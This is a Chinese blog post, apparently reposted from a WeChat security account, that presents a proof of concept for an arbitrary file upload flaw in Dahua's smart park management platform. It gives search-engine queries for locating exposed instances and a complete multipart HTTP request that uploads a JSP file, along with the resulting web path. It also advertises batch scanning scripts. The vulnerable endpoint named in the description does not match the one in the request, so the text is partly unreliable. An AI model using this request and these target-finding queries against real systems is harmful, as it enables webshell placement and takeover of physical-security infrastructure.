# 拒绝知识星球付费POC
免责声明:
本文章仅用于信息安全防御技术分享,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循中华人民共和国相关法律法规,禁止做一切违法犯罪行为。
漏洞描述
漏洞描述 大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。大华智慧园区综合管理平台存在在野 0day 漏洞,攻击者可以通过请求/emap/devicePoint_addImgIco接口任意上传文件,导致系统被攻击与控制。
关键字
fofa语句:app=”dahua-智慧园区综合管理平台”
鹰图语句:web.body=”/WPMS/asset/lib/gridster/“
漏洞复现
POST /publishing/publishing/material/file/video HTTP/1.1Host: xxxUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Length: 245Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7Accept-Encoding: gzip, deflateConnection: close--dd8f988919484abab3816881c55272a7Content-Disposition: form-data; name="Filedata"; filename="Test.jsp"Test--dd8f988919484abab3816881c55272a7Content-Disposition: form-data; name="Submit"submit--dd8f988919484abab3816881c55272a7--
![大华智慧园区综合管理平台任意文件上传[附POC]](http://cn-sec.com/wp-content/uploads/2023/11/6-1700278227.png "大华智慧园区综合管理平台任意文件上传[附POC]")
/publishingImg/VIDEO/231113221005122552.jsp
![大华智慧园区综合管理平台任意文件上传[附POC]](http://cn-sec.com/wp-content/uploads/2023/11/3-1700278228.png "大华智慧园区综合管理平台任意文件上传[附POC]")
检测poc
单个检测:
![大华智慧园区综合管理平台任意文件上传[附POC]](http://cn-sec.com/wp-content/uploads/2023/11/9-1700278228.png "大华智慧园区综合管理平台任意文件上传[附POC]")
批量检测:
![大华智慧园区综合管理平台任意文件上传[附POC]](http://cn-sec.com/wp-content/uploads/2023/11/5-1700278228.png "大华智慧园区综合管理平台任意文件上传[附POC]")
脚本获取方式:
关注本公众号,回复“1008”
原文始发于微信公众号(知攻善防实验室):大华智慧园区综合管理平台任意文件上传[附POC]
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论